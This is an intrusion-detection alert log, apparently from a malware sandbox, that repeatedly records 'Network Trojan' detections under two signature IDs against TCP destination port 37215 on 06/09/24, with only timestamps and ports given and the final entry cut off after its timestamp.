          Timestamp:06/09/24-16:33:21.947585
          SID:2829579
          Source Port:53170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.300770
          SID:2829579
          Source Port:38298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818045
          SID:2835222
          Source Port:43446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.131580
          SID:2835222
          Source Port:33338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.908926
          SID:2829579
          Source Port:52620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.922215
          SID:2835222
          Source Port:44090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205850
          SID:2829579
          Source Port:39086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946911
          SID:2829579
          Source Port:51974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928197
          SID:2835222
          Source Port:51982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167671
          SID:2829579
          Source Port:50382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990759
          SID:2835222
          Source Port:34634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718019
          SID:2829579
          Source Port:55566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863802
          SID:2835222
          Source Port:56142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.601913
          SID:2835222
          Source Port:57604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223044
          SID:2829579
          Source Port:32912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.093307
          SID:2829579
          Source Port:42560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718774
          SID:2835222
          Source Port:58846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643986
          SID:2835222
          Source Port:55166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035140
          SID:2829579
          Source Port:50560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287410
          SID:2829579
          Source Port:37276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165798
          SID:2829579
          Source Port:60934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.289159
          SID:2835222
          Source Port:55850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945078
          SID:2835222
          Source Port:59942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168045
          SID:2835222
          Source Port:37596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602626
          SID:2835222
          Source Port:55588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.091777
          SID:2835222
          Source Port:46436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.951584
          SID:2829579
          Source Port:58680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600324
          SID:2835222
          Source Port:40508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643615
          SID:2829579
          Source Port:37842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476005
          SID:2835222
          Source Port:57042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.479670
          SID:2829579
          Source Port:50828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.471349
          SID:2829579
          Source Port:41756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160909
          SID:2829579
          Source Port:48316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.604676
          SID:2829579
          Source Port:38622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397026
          SID:2835222
          Source Port:57548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718153
          SID:2835222
          Source Port:41966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417473
          SID:2829579
          Source Port:43964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157258
          SID:2835222
          Source Port:41114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.036066
          SID:2829579
          Source Port:56434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.395988
          SID:2829579
          Source Port:48008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.207695
          SID:2835222
          Source Port:45918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644219
          SID:2829579
          Source Port:41036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.156896
          SID:2835222
          Source Port:54522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557394
          SID:2829579
          Source Port:56236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230521
          SID:2829579
          Source Port:35110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930347
          SID:2835222
          Source Port:48628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.949897
          SID:2835222
          Source Port:33548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030761
          SID:2829579
          Source Port:53406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987139
          SID:2835222
          Source Port:32804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865164
          SID:2829579
          Source Port:40058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714725
          SID:2829579
          Source Port:50574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869780
          SID:2829579
          Source Port:51082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720994
          SID:2829579
          Source Port:43456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102662
          SID:2829579
          Source Port:38734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418885
          SID:2829579
          Source Port:32812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869359
          SID:2829579
          Source Port:52252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302412
          SID:2829579
          Source Port:44718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.286360
          SID:2829579
          Source Port:52650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223500
          SID:2829579
          Source Port:53308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166710
          SID:2829579
          Source Port:55982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.245951
          SID:2829579
          Source Port:53656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.297786
          SID:2829579
          Source Port:39214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472040
          SID:2835222
          Source Port:58680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476760
          SID:2829579
          Source Port:42720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644637
          SID:2829579
          Source Port:48654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166790
          SID:2835222
          Source Port:56060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417516
          SID:2835222
          Source Port:55982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076311
          SID:2829579
          Source Port:33840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226482
          SID:2835222
          Source Port:55390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.083404
          SID:2829579
          Source Port:44602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224050
          SID:2829579
          Source Port:55306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646224
          SID:2835222
          Source Port:50958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413138
          SID:2835222
          Source Port:48850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.667903
          SID:2829579
          Source Port:59732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563166
          SID:2829579
          Source Port:54372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102494
          SID:2829579
          Source Port:59752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104804
          SID:2835222
          Source Port:59346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993680
          SID:2835222
          Source Port:57142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865223
          SID:2835222
          Source Port:37448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818226
          SID:2835222
          Source Port:46032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.027246
          SID:2829579
          Source Port:46536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820560
          SID:2829579
          Source Port:39750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.134292
          SID:2835222
          Source Port:55530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077629
          SID:2835222
          Source Port:34724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.653102
          SID:2835222
          Source Port:41202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227262
          SID:2835222
          Source Port:37682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.571527
          SID:2829579
          Source Port:57326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224719
          SID:2835222
          Source Port:44840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.133026
          SID:2835222
          Source Port:43938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.984294
          SID:2829579
          Source Port:59796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.895801
          SID:2835222
          Source Port:39428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230199
          SID:2835222
          Source Port:38032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.919119
          SID:2829579
          Source Port:59692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.989954
          SID:2829579
          Source Port:39854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.101948
          SID:2829579
          Source Port:57520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986239
          SID:2835222
          Source Port:38290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.998596
          SID:2829579
          Source Port:52028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.127799
          SID:2835222
          Source Port:51054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.951622
          SID:2829579
          Source Port:56862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.864526
          SID:2829579
          Source Port:35932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606861
          SID:2829579
          Source Port:50704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035460
          SID:2829579
          Source Port:46414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227350
          SID:2835222
          Source Port:35528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400120
          SID:2829579
          Source Port:40738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412287
          SID:2835222
          Source Port:36174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031848
          SID:2835222
          Source Port:51298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821595
          SID:2835222
          Source Port:36166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476693
          SID:2829579
          Source Port:56076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929933
          SID:2829579
          Source Port:59556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274450
          SID:2829579
          Source Port:41908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.314773
          SID:2829579
          Source Port:50266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721603
          SID:2835222
          Source Port:55042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643809
          SID:2829579
          Source Port:42984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412880
          SID:2835222
          Source Port:49740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.004162
          SID:2829579
          Source Port:35438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289714
          SID:2829579
          Source Port:45184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714275
          SID:2829579
          Source Port:37490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.687475
          SID:2829579
          Source Port:44378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.919136
          SID:2835222
          Source Port:42848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038301
          SID:2829579
          Source Port:58656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223270
          SID:2835222
          Source Port:59932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226042
          SID:2835222
          Source Port:58548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558337
          SID:2829579
          Source Port:45838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398620
          SID:2835222
          Source Port:34942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.901999
          SID:2835222
          Source Port:36118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716266
          SID:2835222
          Source Port:43102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947563
          SID:2829579
          Source Port:54326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161401
          SID:2835222
          Source Port:41754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645440
          SID:2829579
          Source Port:52300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.595102
          SID:2835222
          Source Port:60512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719076
          SID:2829579
          Source Port:50964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034225
          SID:2829579
          Source Port:33254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.676164
          SID:2835222
          Source Port:47012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.901882
          SID:2829579
          Source Port:44066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035281
          SID:2835222
          Source Port:56638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.128945
          SID:2835222
          Source Port:40484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.717047
          SID:2835222
          Source Port:34456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.632050
          SID:2829579
          Source Port:49268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.475583
          SID:2835222
          Source Port:39892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.886903
          SID:2835222
          Source Port:45728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225403
          SID:2835222
          Source Port:46622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.651359
          SID:2835222
          Source Port:47122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166461
          SID:2829579
          Source Port:44286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596228
          SID:2829579
          Source Port:49148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.241880
          SID:2835222
          Source Port:36940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929515
          SID:2829579
          Source Port:50452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283125
          SID:2829579
          Source Port:42908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.569311
          SID:2835222
          Source Port:53418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948836
          SID:2835222
          Source Port:34906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398597
          SID:2829579
          Source Port:35522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415756
          SID:2829579
          Source Port:49274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287187
          SID:2829579
          Source Port:59500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417712
          SID:2835222
          Source Port:48456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248801
          SID:2829579
          Source Port:34554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074693
          SID:2829579
          Source Port:37748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157942
          SID:2835222
          Source Port:58822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.416079
          SID:2829579
          Source Port:52456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162714
          SID:2835222
          Source Port:47622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.033006
          SID:2835222
          Source Port:43710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538281
          SID:2835222
          Source Port:36612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.298409
          SID:2829579
          Source Port:33610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.245034
          SID:2829579
          Source Port:35216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719104
          SID:2829579
          Source Port:42922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645010
          SID:2829579
          Source Port:59018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.948797
          SID:2829579
          Source Port:33420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163061
          SID:2835222
          Source Port:35082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820283
          SID:2835222
          Source Port:46010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645743
          SID:2829579
          Source Port:58060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.996366
          SID:2835222
          Source Port:57914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.653117
          SID:2829579
          Source Port:38996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.241730
          SID:2835222
          Source Port:47952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163567
          SID:2835222
          Source Port:49570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414935
          SID:2829579
          Source Port:60878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169722
          SID:2829579
          Source Port:41888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.893052
          SID:2835222
          Source Port:52932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078483
          SID:2829579
          Source Port:52186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253150
          SID:2829579
          Source Port:58264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224525
          SID:2835222
          Source Port:36516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399461
          SID:2835222
          Source Port:46944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869925
          SID:2829579
          Source Port:40132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413695
          SID:2835222
          Source Port:58520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564237
          SID:2835222
          Source Port:52296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.288510
          SID:2835222
          Source Port:52920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035460
          SID:2829579
          Source Port:38366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720104
          SID:2835222
          Source Port:53718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539076
          SID:2835222
          Source Port:54878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986954
          SID:2835222
          Source Port:59056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223113
          SID:2835222
          Source Port:36542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412402
          SID:2829579
          Source Port:45796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.286695
          SID:2835222
          Source Port:52100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035930
          SID:2829579
          Source Port:51348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.552310
          SID:2835222
          Source Port:37574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.010593
          SID:2829579
          Source Port:38892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822656
          SID:2829579
          Source Port:60754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823303
          SID:2835222
          Source Port:52622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.295374
          SID:2835222
          Source Port:34384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292297
          SID:2835222
          Source Port:48764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.277197
